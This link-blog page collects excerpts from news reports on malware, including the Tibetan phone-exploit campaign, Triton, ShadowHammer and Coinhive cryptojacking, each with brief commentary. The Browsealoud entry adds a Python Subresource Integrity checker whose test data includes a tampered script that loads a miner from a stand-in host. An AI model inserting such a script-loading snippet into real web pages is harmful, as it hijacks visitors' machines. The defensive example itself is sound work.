
charlesarthur : malware   119

Inside the campaign that tried to compromise Tibetans’ iOS and Android phones • Ars Technica
Dan Goodin:
<p>Attackers from a group dubbed Poison Carp used one-click exploits and convincing social engineering to target iOS and Android phones belonging to Tibetan groups in a six-month campaign, researchers said. The attacks used mobile platforms to achieve a major escalation of the decade-long espionage hacks threatening the embattled religious community, researchers said.

The <a href="https://citizenlab.ca/2019/09/poison-carp-tibetan-groups-targeted-with-1-click-mobile-exploits/">report was published on Tuesday by Citizen Lab</a>, a group at the University of Toronto's Munk School that researches hacks on activists, ethnic groups, and others. The report said the attackers posed as New York Times journalists, Amnesty International researchers, and others to engage in conversations over the WhatsApp messenger with individuals from the Private Office of His Holiness the Dalai Lama, the Central Tibetan Administration, the Tibetan Parliament, and Tibetan human rights groups. In the course of the conversation, the attackers would include links to websites that hosted "one-click" exploits—meaning they required only a single click to infect vulnerable phones.

None of the attacks Citizen Lab observed was successful, because the vulnerabilities exploited had already been patched on the iOS and Android devices that were attacked. Still, the attackers succeeded in getting eight of the 15 people they targeted to open malicious links, and bit.ly-shortened attack pages targeting iPhone users were clicked on 140 times. The research and coordination that went into bringing so many targeted people to the brink of exploitation suggest that the attackers behind the campaign—which ran from November 2018 to last May—were skilled and well-organized.</p>


This is separate from the attack reported by Google Project Zero to target Uighur Muslims, also by China, but has lots of the same malware families. Citizen Lab says the Android malware used "hadn't previously been documented" (but failed nonetheless). Read Goodin's writeup (or the CL original): this was very sophisticated.
china  tibet  malware  hacking 
17 days ago by charlesarthur
Returning rogue weather app continues mobile ad fraud • Upstream
<p>First discovered in January 2019 by mobile technology company Upstream to be triggering false premium transactions and, at the time, secretly harvesting consumer data, the app – called Weather Forecast: World Weather Accurate Radar – is preinstalled on specific Alcatel phones and also available on Google Play Store. Following the revelation by Upstream the app immediately ceased its background activity and was withdrawn from the Play Store. [It subsequently returned to the Google Play Store.]

However, after an idle two-month period and despite the earlier exposure, Upstream says its Secure-D mobile security platform combating advertising fraud detected and blocked some 34 million fresh suspicious transaction attempts from Weather Forecast. The version of the weather app preinstalled on Alcatel Pixi4 devices attempted to subscribe nearly 700,000 mobile consumers to premium digital services without their knowledge in just six months.</p>
google  malware 
20 days ago by charlesarthur
File-storage app 4shared caught serving invisible ads and making purchases without consent • TechCrunch
Zack Whittaker:
<p>With more than 100 million installs, file-sharing service 4shared is one of the most popular apps in the Android app store.

But security researchers say the app is secretly displaying invisible ads and subscribes users to paid services, racking up charges without the user’s knowledge — or their permission — collectively costing millions of dollars.

“It all happens in the background… nothing appears on the screen,” said Guy Krief, chief executive of London-based Upstream, which shared its research exclusively with TechCrunch.

The researchers say the app contains suspicious third-party code that allowed the app to automate clicks and make fraudulent purchases. They said the component, built by Hong Kong-based Elephant Data, downloads code which is “directly responsible” for generating the automated clicks without the user’s knowledge. The code also sets a cookie to determine if a device has previously been used to make a purchase, likely as a way to hide the activity.</p>
malware 
july 2019 by charlesarthur
How Chinese spies got the NSA’s hacking tools, and used them for attacks • NY Times
Nicole Perlroth, David E. Sanger and Scott Shane:
<p>Symantec’s discovery, <a href="https://www.symantec.com/blogs/threat-intelligence/buckeye-windows-zero-day-exploit">unveiled on Monday</a>, suggests that the same Chinese hackers the agency has trailed for more than a decade have turned the tables on the agency.

Some of the same N.S.A. hacking tools acquired by the Chinese were later dumped on the internet by a still-unidentified group that calls itself the Shadow Brokers and used by Russia and North Korea in devastating global attacks, although there appears to be no connection between China’s acquisition of the American cyberweapons and the Shadow Brokers’ later revelations.

But Symantec’s discovery provides the first evidence that Chinese state-sponsored hackers acquired some of the tools months before the Shadow Brokers first appeared on the internet in August 2016.

Repeatedly over the past decade, American intelligence agencies have had their hacking tools and details about highly classified cybersecurity programs resurface in the hands of other nations or criminal groups.</p>

This makes it much more risky to deploy hacks; any and all targets are getting much better at isolating and identifying cyberweapons. It's getting like chemical or biological warfare: the tools are getting too dangerous to deploy.
malware  hacking  state 
may 2019 by charlesarthur
Google is banning a Play Store developer with more than half a billion app installs and ties to Baidu • Buzzfeed News
Craig Silverman:
<p>As of today, 46 apps from DO Global, which is partly owned by internet giant Baidu, are gone from the Play store. BuzzFeed News also found that DO Global apps no longer offer ad inventory for purchase via Google's AdMob network, suggesting the ban has also been extended to the internet giant's ad products.

Google would not comment specifically on the removals, but a source with knowledge of the action said the company was moving to ban DO Global overall, and that more app removals would follow.

"We actively investigate malicious behavior, and when we find violations, we take action, including the removal of a developer’s ability to monetize their app with AdMob or publish on Play," a Google spokesperson said.

Prior to the app removals, DO Global had roughly 100 apps in the Play store with over 600 million installs. Their removal from the Play store marks one of the biggest bans, if not the biggest, Google has ever instituted against an app developer. DO Global was a subsidiary of Baidu until it was spun out last summer; Baidu retains a 34% stake.

After this story was published, DO Global issued a statement to BuzzFeed News that acknowledged and apologized for "irregularities" in its apps, and said it accepts Google's decision.</p>


Hooray for curated app stores, I guess, and users (and journalists) who keep a close eye on them.
playstore  malware  advertising 
april 2019 by charlesarthur
Pirated streaming devices are filled with malware, researchers find • CNET
Alfred Ng:
<p>While you may have bought a bona fide Apple TV or Roku to watch shows on Netflix or Hulu, there's an entire market online for jailbroken and modified devices that are tuned to watch this same content for free. They come at a much cheaper price and offer free, unlimited access to shows that you'd normally have to pay a subscription fee for.

These devices work just like a Roku or a Fire TV Stick - you plug it into your TV and connect it to your Wi-Fi network. In some cases, they're loaded with apps.

If <a href="https://www.digitalcitizensalliance.org/clientuploads/directory/Reports/DCA_Fishing_in_the_Piracy_Stream_v6.pdf">the hardware isn't laced with malware, the apps are</a>, Timber Wolfe, a principal at Dark Wolfe Consulting, found in his research. He said 40% of apps for these devices were infected with malware that can take over a camera or microphone on the network within the first hour.

As viewers move to streaming devices to watch shows, like Apple TVs, Rokus, Chromecasts and Fire TVs, black market sellers have capitalized on cordcutters by offering pirated alternatives. Cybercriminals have taken notice, by targeting these bootleg boxes with malware, researchers found.</p>


Not just the camera: these "Kodi boxes" grab usernames and passwords by probing the user network; people who buy them are seven times more likely to report problems with malware.
piracy  malware 
april 2019 by charlesarthur
Mysterious hackers hid their 'Swiss Army' spyware for five years • WIRED
Andy Greenberg:
<p>Kaspersky says it first detected the TajMahal spyware framework last fall, on only a single victim's network: The embassy of a Central Asian country whose nationality and location Kaspersky declines to name. But given the software's sophistication, Shulmin says TajMahal has likely been deployed elsewhere. "It seems highly unlikely that such a huge investment would be undertaken for only one victim," he writes. "This suggests that there are either further victims not yet identified, or additional versions of this malware in the wild, or possibly both."

Those initial findings may indicate a very cautious and discreet state-sponsored intelligence-gathering operation, says Jake Williams, a former member of the National Security Agency's elite Tailored Access Operations hacking group. "The extensibility of it requires a large developer team," Williams notes. He points out also that the ability to avoid detection and the single known victim suggest extreme care in targeting, stealth, and operation security. "There's all kinds of stuff here that screams opsec and very regimented tasking."

Shulmin says Kaspersky hasn't yet been able to connect TajMahal, named for a file the spyware uses to move stolen data off a victim's machine, to any known hacker groups with the usual methods of code-matching, shared infrastructure, or familiar techniques. Its Central Asian target doesn't exactly provide any easy clues as to the hackers' identities either, given the vagueness of that description and the countries with sophisticated hacker teams with Central Asian interests, including China, Iran, Russia and the US. Nor has Kaspersky determined how the hackers behind TajMahal gain initial access to a victim network. But they do note that the group plants an initial backdoor program on machines, which the hackers labelled Tokyo.</p>


"Central Asia" implies somewhere in the ambit of Russia and China to me. Could be US, could be Israel, could be China, could be Russia.
hacking  malware  state 
april 2019 by charlesarthur
A powerful spyware app now targets iPhone owners • TechCrunch
Zack Whittaker:
<p>Security researchers have discovered a powerful surveillance app first designed for Android devices can now target victims with iPhones.

The spy app, found by researchers at mobile security firm Lookout, said its developer abused their Apple-issued enterprise certificates to bypass the tech giant’s app store to infect unsuspecting victims.

The disguised carrier assistance app once installed can silently grab a victim’s contacts, audio recordings, photos, videos and other device information — including their real-time location data. It can be remotely triggered to listen in on people’s conversations, the researchers found. Although there was no data to show who might have been targeted, the researchers noted that the malicious app was served from fake sites purporting to be cell carriers in Italy and Turkmenistan.

Researchers linked the app to the makers of a previously discovered Android app, developed by the same Italian surveillance app maker Connexxa, known to be in use by the Italian authorities.</p>


What's not clear is whether the app could grab those contacts, photos etc without the user's permission, or whether iOS's permissions structure is robust against that threat. Of course the social engineering side - "this app needs to access…" - can still work.
iphone  malware  hacking  security 
april 2019 by charlesarthur
Researchers find Google Play store apps were actually government malware • Motherboard
Lorenzo Franceschi-Bicchierai and Riccardo Coluccini:
<p>Hackers working for a surveillance company infected hundreds of people with several malicious Android apps that were hosted on the official Google Play Store for months, Motherboard has learned.

In the past, both government hackers and those working for criminal organizations have uploaded malicious apps to the Play Store. This new case once again highlights the limits of Google’s filters that are intended to prevent malware from slipping onto the Play Store. In this case, more than 20 malicious apps went unnoticed by Google over the course of roughly two years.

Motherboard has also learned of a new kind of Android malware on the Google Play store that was sold to the Italian government by a company that sells surveillance cameras but was not known to produce malware until now. Experts told Motherboard the operation may have ensnared innocent victims as the spyware appears to have been faulty and poorly targeted. Legal and law enforcement experts told Motherboard the spyware could be illegal.</p>


Italy's government subsequently shut down the malware infrastructure and investigated the company behind the spyware.
security  google  malware 
april 2019 by charlesarthur
Hacker Eva Galperin has a plan to eradicate stalkerware • WIRED
Andy Greenberg:
<p>"Full access to someone’s phone is essentially full access to someone’s mind," says Galperin, a security researcher who leads the Threat Lab of the digital civil liberties group the Electronic Frontier Foundation. "The people who end up with this software on their phones can become victims of physical abuse, of physical stalking. They get beaten. They can be killed. Their children can be kidnapped. It’s the small end of a very large, terrifying wedge."

Now Galperin has a plan to end that scourge for good—or at least take a serious bite out of the industry. In a talk she is scheduled to give next week at the Kaspersky Security Analyst Summit in Singapore, Galperin will lay out a list of demands: First, she's calling on the antivirus industry to finally take the threat of stalkerware seriously, after years of negligence and inaction. She'll also ask Apple to take measures to protect iPhone users from stalkerware, given that the company doesn't allow antivirus apps into its App Store. Finally, and perhaps most drastically, she says she'll call on state and federal officials to use their prosecutorial powers to indict executives of stalkerware-selling companies on hacking charges. "It would be nice to see some of these companies shut down," she says. "It would be nice to see some people go to jail."

Ahead of her talk, Galperin has notched her first win: Russian security firm Kaspersky announced today that it will make a significant change to how its antivirus software treats stalkerware on Android phones, where it's far more common than on iPhones. Rather than merely flag those spy apps as suspect but label them with a confusing "not a virus" message, as it has for most breeds of stalkerware in the past, Kaspersky's software will now show its users an unmistakeable "privacy alert" for any of dozens of blacklisted apps, and then offer options to delete or quarantine them to cut off their access to sensitive information.</p>
stalking  malware 
april 2019 by charlesarthur
Hackers hijacked ASUS software updates to install backdoors on thousands of computers • Motherboard
<p>Researchers at cybersecurity firm Kaspersky Lab say that ASUS, one of the world’s largest computer makers, was used to unwittingly install a malicious backdoor on thousands of its customers’ computers last year after attackers compromised a server for the company’s live software update tool. The malicious file was signed with legitimate ASUS digital certificates to make it appear to be an authentic software update from the company, Kaspersky Lab says…

…The researchers estimate half a million Windows machines received the malicious backdoor through the ASUS update server, although the attackers appear to have been targeting only about 600 of those systems. The malware searched for targeted systems through their unique MAC addresses. Once on a system, if it found one of these targeted addresses, the malware reached out to a command-and-control server the attackers operated, which then installed additional malware on those machines.

Kaspersky Lab said it uncovered the attack in January after adding a new supply-chain detection technology to its scanning tool to catch anomalous code fragments hidden in legitimate code or catch code that is hijacking normal operations on a machine. The company plans to release a full technical paper and presentation about the ASUS attack, which it has dubbed ShadowHammer, next month at its Security Analyst Summit in Singapore. In the meantime, Kaspersky has<a href="https://securelist.com/operation-shadowhammer/89992/"> published some of the technical details on its website</a>.</p>


Asus, you won't be surprised to hear, hadn't responded by publication time.
asus  infection  malware 
march 2019 by charlesarthur
Triton is the world’s most murderous malware, and it’s spreading • MIT Technology Review
Martin Giles:
<p>In a worst-case scenario, the rogue code could have led to the release of toxic hydrogen sulfide gas or caused explosions, putting lives at risk both at the facility and in the surrounding area.

[Julian] Gutmanis recalls that dealing with the malware at the petrochemical plant, which had been restarted after the second incident, was a nerve-racking experience. “We knew that we couldn’t rely on the integrity of the safety systems,” he says. “It was about as bad as it could get.”

In attacking the plant, the hackers crossed a terrifying Rubicon. This was the first time the cybersecurity world had seen code deliberately designed to put lives at risk. Safety instrumented systems aren’t just found in petrochemical plants; they’re also the last line of defence in everything from transportation systems to water treatment facilities to nuclear power stations.

Triton’s discovery raises questions about how the hackers were able to get into these critical systems. It also comes at a time when industrial facilities are embedding connectivity in all kinds of equipment—a phenomenon known as the industrial internet of things. This connectivity lets workers remotely monitor equipment and rapidly gather data so they can make operations more efficient, but it also gives hackers more potential targets.</p>


First spotted late in 2017; origin still unknown.
security  malware  triton 
march 2019 by charlesarthur
Coinhive cryptojacking service to shut down in March 2019 • ZDNet
Catalin Cimpanu:
<p>Coinhive, an in-browser Monero cryptocurrency miner famous for being abused by malware gangs, announced this week its intention to shut down all operations next month, on March 8, 2019.

The service cited multiple reasons for its decision <a href="https://coinhive.com/blog/en/discontinuation-of-coinhive">in a blog post</a> published yesterday.

"The drop in hash rate (over 50%) after the last Monero hard fork hit us hard," the company said. "So did the 'crash' of the crypto currency market with the value of XMR depreciating over 85% within a year."

"This and the announced hard fork and algorithm update of the Monero network on March 9 has led us to the conclusion that we need to discontinue Coinhive," the company said.

Coinhive said all in-browser Monero mining will stop working after March 8, and registered users will have until April 30 to withdraw funds from their accounts.</p>


Until someone malicious buys the domain and reactivates the code, which will still be sitting dormant on thousands of sites. Of note: "according to <a href="https://arxiv.org/pdf/1808.00811.pdf">an academic paper</a>, the company was making an estimated $250,000 per month up until last summer."
coinhive  cryptojacking  malware  bitcoin 
february 2019 by charlesarthur
Biohackers encoded malware in a strand of DNA • WIRED
Andy Greenberg:
<p>In new research they plan to present at the USENIX Security conference on Thursday, a group of researchers from the University of Washington has shown for the first time that it’s possible to encode malicious software into physical strands of DNA, so that when a gene sequencer analyzes it the resulting data becomes a program that corrupts gene-sequencing software and takes control of the underlying computer. While that attack is far from practical for any real spy or criminal, it's one the researchers argue could become more likely over time, as DNA sequencing becomes more commonplace, powerful, and performed by third-party services on sensitive computer systems. And, perhaps more to the point for the cybersecurity community, it also represents an impressive, sci-fi feat of sheer hacker ingenuity.

“We know that if an adversary has control over the data a computer is processing, it can potentially take over that computer,” says Tadayoshi Kohno, the University of Washington computer science professor who led the project, comparing the technique to traditional hacker attacks that package malicious code in web pages or an email attachment. “That means when you’re looking at the security of computational biology systems, you’re not only thinking about the network connectivity and the USB drive and the user at the keyboard but also the information stored in the DNA they’re sequencing. It’s about considering a different class of threat.”</p>


That is fabulously clever. (Thanks to the many people who sent this; Paul Guinnessy was first, I believe.) It's obvious when you think about it: a Turing machine reading an instruction set.
malware  hacking  dna 
february 2019 by charlesarthur
Google Play apps with more than 4.3 million downloads stole pics and pushed porn ads • Ars Technica
Dan Goodin:
<p>A <a href="https://blog.trendmicro.com/trendlabs-security-intelligence/various-google-play-beauty-camera-apps-sends-users-pornographic-content-redirects-them-to-phishing-websites-and-collects-their-pictures/">blog post published by security firm Trend Micro</a> listed 29 camera- or photo-related apps, with the top 11 of them fetching 100,000 to 1 million downloads each. One crop of apps caused browsers to display full-screen ads when users unlocked their devices. Clicking the pop-up ads in some cases caused a paid online pornography player to be downloaded, although it was incapable of playing content. The apps were carefully designed to conceal their malicious capabilities.

“None of these apps give any indication that they are the ones behind the ads, thus users might find it difficult to determine where they’re coming from,” Trend Micro Mobile Threats Analyst Lorin Wu wrote. “Some of these apps redirect to phishing websites that ask the user for personal information, such as addresses and phone numbers.”

The apps also hid their icons from the Android app list. That made it hard for users to uninstall the apps, since there was no icon to drag and delete. The apps also used compression archives known as packers to make it harder for researchers—or presumably, tools Google might use to weed out malicious apps—from analyzing the wares.</p>
google  malware 
february 2019 by charlesarthur
I’ve got a bridge to sell you: why AutoCAD malware keeps chugging on • Ars Technica
Dan Goodin:
<p>The attacks aren’t new. Similar ones occurred as long ago as 2005, before AutoCAD provided the same set of robust defenses against targeted malware it does now. The attacks continued to go strong in 2009. A specific campaign recently spotted by security firm Forcepoint was active as recently as this year and has been active since at least 2014, an indication that malware targeting blueprints isn’t going away any time soon.

In an analysis expected to be published Wednesday, company researchers wrote:
<p>CAD changed our modern life and, as an unfortunate side effect, industrial espionage also changed along with it. Design schemes, project plans, and similar vital documents are being stored and shared between parties in a digital manner. The value of these documents–especially in new and prospering industries such as renewable energy–have probably never been this high. All this makes it attractive for the more skilled cybercriminal groups to chip in: instead of spamming out millions of emails and waiting for people to fall for it, significantly more money can be realized by selling blueprints to the highest bidder.</p>


Forcepoint said it has tracked more than 200 data sets and about 40 unique malicious modules, including one that purported to include a design for Hong Kong’s Zhuhai-Macau Bridge. The attacks include a precompiled and encrypted AutoLISP program titled acad.fas. It first copies itself to three locations in an infected computer to increase the chances it will be opened if it spreads to new computers. Infected computers also report to attacker-controlled servers, which use a series of obfuscated commands to download documents.</p>
autocad  malware 
november 2018 by charlesarthur
A top-tier app in Apple’s Mac App Store stole your browser history • TechCrunch
Zack Whittaker:
<p>Thanks in part to a <a href="https://www.youtube.com/watch?v=nZ7CVIy5Tq8&feature=youtu.be">video posted last month</a> on YouTube and with help from security firm Malwarebytes, it’s now clear what the app [Adware Doctor] is up to.

Security researcher Patrick Wardle, a former NSA hacker and now chief research officer at cybersecurity startup Digita Security, dug in and shared his findings with TechCrunch.

Wardle found that the downloaded app jumped through hoops to bypass Apple’s Mac sandboxing features, which prevent apps from grabbing data on the hard drive, and upload a user’s browser history on Chrome, Firefox and Safari browsers.

Wardle found that the app, thanks to Apple’s own flawed vetting, could request access to the user’s home directory and its files. That isn’t out of the ordinary, Wardle says, because tools that market themselves as anti-malware or anti-adware expect access to the user’s files to scan for problems. When a user allows that access, the app can detect and clean adware — but if found to be malicious, it can “collect and exfiltrate any user file,” said Wardle.

Once the data is collected, it’s zipped into an archive file and sent to a domain based in China.

Wardle said that for some reason in the last few days the China-based domain went offline. At the time of writing, TechCrunch confirmed that the domain wouldn’t resolve — in other words, it was still down.

“Let’s face it, your browsing history provides a glimpse into almost every aspect of your life,” said Wardle’s post. “And people have even been convicted based largely on their internet searches!”

He said that the app’s access to such data “is clearly based on deceiving the user.”</p>


I'd suggest that anything which claims to be helping you with adware is going to be a scam, unless it comes from a recognised cybersecurity company. The solution to adware is not running vulnerable products such as Flash and Java, and to be wary about what you download. At least Apple makes it hard to run apps from outside the Mac App Store.

This won't, of course, help anyone's trust in Huawei, ZTE and other Chinese companies with their own high-profile problems.
apple  malware  adware 
september 2018 by charlesarthur
60,000 Android devices hit by battery-saving app attack • Tripwire
Graham Cluley on a scam that "warns" you that your (Android) device - which it names, by some HTML-grabbing functionality - has a problem and recommends the app (and the only way to stop it is to kill the web page):
<p>So what happens if you do go to the Google Play store and install the battery-saving app being touted by the fake warning?

The first thing that should ring alarm bells in you is that the app demands access to a disturbing array of permissions including:

• Read sensitive log data
• Receive text messages (SMS)
• Receive data from Internet
• Pair with Bluetooth devices
• Full network access
• Modify system settings
I can’t think of any legitimate reason why a genuine battery-saving app would ever need such invasive abilities, which in combination with the app’s other functionality allows it to steal a user’s phone number, location, and details about their device including its IMEI number.

And so it comes as something of a surprise to discover that the Advanced Battery Saver app actually does live up to its advertising – monitoring a device’s battery status, killing unwanted background processes that consume significant resources, and making other attempts to keep batteries running for longer.

And it’s this strange dichotomy – the good and the bad behavior – which leads the researchers to speculate that the battery-saving app was perhaps originally designed to perform its intended advertised function (and to fulfill only that purpose) before being extended by its creators into underhand methods of income generation.

Chief among those is the app’s request for access to a user’s SMS text messages. Once installed, the battery-saving app recruits devices into an ad-clicking scam, with the app “clicking” on advertising links it is sent via SMS to earn more income for the fraudsters behind the scheme.</p>


There's no money in standard apps at that level now, if there ever was.
android  malware 
june 2018 by charlesarthur
They’re on the lookout for malware that can kill • The Washington Post
Ellen Nakashima and Aaron Gregg:
<p>Dragos built a software product to help industrial companies detect cyberthreats to their networks and respond to them. Its clients include energy, manufacturing and petrochemical factories in the United States, Europe and Middle East.

In October, Dragos discovered Trisis, a malware that targets a “safety instrumented system,” or a machine whose sole function is to prevent fatal accidents. In a petrochemical plant, for instance, there are machines that operate at very high pressures, and if a valve blows, the pressure or the leak of hazardous materials could kill a human being. But a safety instrumented machine is supposed to shut down the entire system to reduce the risk of a fatal accident.

There has been one known deployment of the Trisis malware — FireEye called it Triton — at a petrochemical plant in Saudi Arabia in August. But a coding error prevented the malware from working as intended, and a potential catastrophe was averted.

As of this week the culprits behind Trisis were still active in the Middle East, Lee said. “It’s reasonable to assume that [what happened last year] is not a one-time event.’’

Though Dragos had some indication of who was responsible, the firm refrained from drawing a conclusion. “It wasn’t cut and dried,” Lee said. Dragos shared the malware with the Department of Homeland Security, but Lee argued against the government seeking to assign blame.

“The best they could do is a well-reasoned guess,” he said. “There’s not the years’ worth of data on this event that would make attribution possible.”</p>
malware  iot 
may 2018 by charlesarthur
Russian pleads guilty to aiding massive hacks in US • Daily Beast
Kevin Poulsen:
<p>Jurijs Martisevs, a 36-year-old Moscovite arrested on a trip to Latvia, helped run a service called Scan4you that filled a crucial niche in the underground economy. Before deploying a piece of malware, hackers need to know it won't be immediately detected and quarantined by the dozens of consumer and commercial security products on the market. That’s where Scan4you comes in. For fifteen cents a pop, a hacker could upload their pre-launch code to Scan4you, which would then automatically check it against 30 different security scanners and report back the results.

Armed with that information, a hacker can make iterative changes to their code until the detection rate is sufficiently low, or even zero. Scan4you was the most successful of a slew of similar offerings advertised on underground forums, and operated from at least 2009 until the arrest of Martisevs and a co-defendant last year.

"Throughout its lifetime, the service has had thousands of users,” reads a statement of facts agreed to by Martisevs, “and has received and scanned millions of malicious files.”

According to Martisevs' plea documents, Scan4you's customers included some serious players, including the perpetrators of a national retail breach in November 2013. The retailer is unnamed, but the timing and description coincides with that month’s massive Target hack. The hackers submitted variations of their credit card stealing code to Scan4you four times over the course of two weeks before finally deploying the malware on Black Friday weekend. The Target breach ultimately netted thieves some 40 million credit and debit cards, and resulted in a $10 million consumer class action against Target.

Ruslans Bondars, Martisevs' co-defendant, was allegedly the creator and technical brains behind Scan4you. Bondars is a Latvian national extradited along with Martisevs. He’s in custody pending a May trial date.</p>

The Feds may have the full database of malware, and even customer details. That would be a hell of a thing.
Security  malware  hacking  trial 
march 2018 by charlesarthur
Bad traffic: Sandvine’s PacketLogic devices used to deploy government spyware in Turkey and redirect Egyptian users to affiliate ads? • Citizenlab
Bill Marczak, Jakub Dalek, Sarah McKune, Adam Senft, John Scott-Railton, and Ron Deibert
<p>• Through Internet scanning, we found deep packet inspection (DPI) middleboxes on Türk Telekom’s network. The middleboxes were being used to redirect hundreds of users in Turkey and Syria to nation-state spyware when those users attempted to download certain legitimate Windows applications.

• We found similar middleboxes at a Telecom Egypt demarcation point. On a number of occasions, the middleboxes were apparently being used to hijack Egyptian Internet users’ unencrypted web connections en masse, and redirect the users to revenue-generating content such as affiliate ads and browser cryptocurrency mining scripts.

• After an extensive investigation, we matched characteristics of the network injection in Turkey and Egypt to Sandvine PacketLogic devices. We developed a fingerprint for the injection we found in Turkey, Syria, and Egypt and matched our fingerprint to a second-hand PacketLogic device that we procured and measured in a lab setting.

• The apparent use of Sandvine devices to surreptitiously inject malicious and dubious redirects for users in Turkey, Syria, and Egypt raises significant human rights concerns.</p>
security  malware  hacking  government 
march 2018 by charlesarthur
More Mailchimp malware: invoice 1717 from City Sign Graphics Ltd • My Online Security
<p>Back today with even more Mailchimp abuse and attempted malware spreading. By the time I got round to investigating the email, the links in it were down. At first I got a "Hostgator account suspended" message but now get an "error 500 server misconfigured" message. A Twitter post gave me the file # of the downloaded malware that I assume is still the Gootkit banking Trojan.

We still have no idea how the victim companies’ details or login credentials to the Mailchimp network are being stolen or compromised.

This next email has the subject "Invoice 1717 from CITY SIGN AND GRAPHICS LTD", coming from CITY SIGN AND GRAPHICS LTD <callum.cooper=fleetalliance.co.uk@mail59.atl111.rsgsv.net> on behalf of CITY SIGN & GRAPHICS LTD <callum.cooper@fleetalliance.co.uk>

About one month ago we saw a malware campaign using Mailchimp to distribute the Gootkit banking trojan. Since then there has been a regular, almost daily campaign. Today’s campaign has changed slightly and although the initial emails are coming via the Mailchimp system, the malware downloader and the payloads are coming from other sites which are probably/almost certainly compromised.

They use email addresses and subjects that will entice a user to read the email and open the attachment. A very high proportion are being targeted at small and medium size businesses, with the hope of getting a better response than they do from consumers.</p>

Obvious enough how they get Mailchimp logins: people are lazy and reuse them, and they get phished elsewhere. (Or you send out a phishing campaign around Mailchimp.)

It's long past time that username/password was enough to log you in to services that can reach so many people. And I say that as a user of Mailchimp.
Mailchimp  malware 
march 2018 by charlesarthur
Thousands of UK and US government websites hijacked by hidden crypto-mining code after popular plugin hacked • The Register
Chris Williams:
<p>Thousands of websites around the world – from the UK's NHS and ICO to the US government's court system – were today secretly mining crypto-coins on netizens' web browsers for miscreants unknown.

The affected sites all use a fairly popular plugin called Browsealoud, made by Brit biz Texthelp, which reads out webpages for blind or partially sighted people.

This technology was compromised in some way – either by hackers or rogue insiders altering Browsealoud's source code – to silently inject Coinhive's Monero miner into every webpage offering Browsealoud.

For several hours today, anyone who visited a site that embedded Browsealoud inadvertently ran this hidden mining code on their computer, generating money for the miscreants behind the caper.

A list of 4,200-plus affected websites can be found <a href="https://publicwww.com/websites/browsealoud.com%2Fplus%2Fscripts%2Fba.js/">here</a>: they include The City University of New York (cuny.edu), Uncle Sam's court information portal (uscourts.gov), Lund University (lu.se), the UK's Student Loans Company (slc.co.uk), privacy watchdog The Information Commissioner's Office (ico.org.uk) and the Financial Ombudsman Service (financial-ombudsman.org.uk), plus a shedload of other .gov.uk and .gov.au sites, UK NHS services, and other organizations across the globe…

The Monero miner was added to Browsealoud's code some time between 0300 and 1145 UTC…Coinhive's code is mostly detected and stopped by antivirus packages and ad-blocking tools.</p>

Adblocking as the easy way to avoid malware, pt 943.
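The Browsealoud incident is the textbook case for Subresource Integrity: every site embedding ba.js ran whatever Texthelp's server handed out, so one altered file became 4,200 miners. The check below is an added example (not code from The Register, Texthelp or any affected site) of what an embedding site can do: pin the hash of the script it reviewed in the `integrity` attribute and refuse a copy whose hash differs, which is exactly what an appended miner loader produces. The script bodies and hostnames are constructed stand-ins, not the real ba.js.

```python
"""Subresource Integrity (SRI) check for a third-party script.

Added example; not code from The Register, Texthelp or any affected site.
The script bodies and hostnames are constructed stand-ins.
"""
import base64
import hashlib

# Constructed stand-in for the script as it was reviewed and approved.
REVIEWED_SCRIPT = b"(function(){window.ba={ready:true};})();\n"

# Constructed stand-in for the tampered copy: the same script with a loader
# for a miner appended. The hostname is made up.
TAMPERED_SCRIPT = REVIEWED_SCRIPT + (
    b"var s=document.createElement('script');"
    b"s.src='https://miner.example/lib/miner.min.js';"
    b"document.head.appendChild(s);\n"
)

SRI_ALGOS = ("sha256", "sha384", "sha512")  # the only algorithms SRI allows


def sri_hash(body: bytes, algo: str = "sha384") -> str:
    """Return an integrity attribute value, e.g. "sha384-<base64 digest>"."""
    if algo not in SRI_ALGOS:
        raise ValueError(f"SRI does not allow {algo}")
    digest = hashlib.new(algo, body).digest()
    return f"{algo}-{base64.b64encode(digest).decode('ascii')}"


def integrity_ok(body: bytes, integrity: str) -> bool:
    """Decide whether a fetched body may run under an integrity attribute.

    Mirrors the browser rule: the attribute may carry several
    whitespace-separated hashes; entries with unknown algorithms are
    ignored, only entries using the strongest algorithm present count,
    and the body passes if it matches any one of those.
    """
    by_algo = {}
    for token in integrity.split():
        algo, _, value = token.partition("-")
        if algo in SRI_ALGOS and value:
            by_algo.setdefault(algo, set()).add(value)
    if not by_algo:
        return False  # no usable hash: refuse rather than run unchecked
    strongest = max(by_algo, key=SRI_ALGOS.index)
    actual = sri_hash(body, strongest).split("-", 1)[1]
    return actual in by_algo[strongest]


def script_tag(src: str, reviewed_body: bytes) -> str:
    """Emit the <script> tag that pins the reviewed copy of a cross-origin script."""
    return (f'<script src="{src}" integrity="{sri_hash(reviewed_body)}" '
            'crossorigin="anonymous"></script>')


if __name__ == "__main__":
    pinned = sri_hash(REVIEWED_SCRIPT)
    print(script_tag("https://cdn.example/ba.js", REVIEWED_SCRIPT))
    print("reviewed copy runs:", integrity_ok(REVIEWED_SCRIPT, pinned))
    print("tampered copy runs:", integrity_ok(TAMPERED_SCRIPT, pinned))
```

Two caveats a practitioner should keep in mind. SRI only covers the file whose hash you pinned: a loader script that goes on to fetch further resources is protected only as far as that first file, and a vendor that changes the file on every release forces you to re-pin (which is the point: you re-review). And for a cross-origin script the browser only enforces the hash when the response is served with CORS headers, hence the `crossorigin` attribute. A Content-Security-Policy `script-src` that lists allowed hosts would separately have stopped the miner loading from Coinhive's domain.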
Cryptominer  malware  malvertising 
february 2018 by charlesarthur
Now even YouTube serves ads with CPU-draining cryptocurrency miners • Ars Technica
Dan Goodin:
<p>On Friday, researchers with antivirus provider Trend Micro said the ads helped drive a more than three-fold spike in Web miner detections. They said the attackers behind the ads were abusing Google's DoubleClick ad platform to display them to YouTube visitors in select countries, including Japan, France, Taiwan, Italy, and Spain.

The ads contain JavaScript that mines the digital coin known as Monero. In nine out of 10 cases, the ads will use publicly available JavaScript provided by Coinhive, a cryptocurrency-mining service that's controversial because it allows subscribers to profit by surreptitiously using other people's computers. The remaining 10 percent of the time, the YouTube ads use private mining JavaScript that saves the attackers the 30 percent cut Coinhive takes. Both scripts are programmed to consume 80 percent of a visitor's CPU, leaving just barely enough resources for it to function.

"YouTube was likely targeted because users are typically on the site for an extended period of time," independent security researcher Troy Mursch told Ars. "This is a prime target for cryptojacking malware, because the longer the users are mining for cryptocurrency the more money is made." Mursch said a campaign from September that used the Showtime website to deliver cryptocurrency-mining ads is another example of attackers targeting a video site.</p>
google  malware  advertising 
january 2018 by charlesarthur
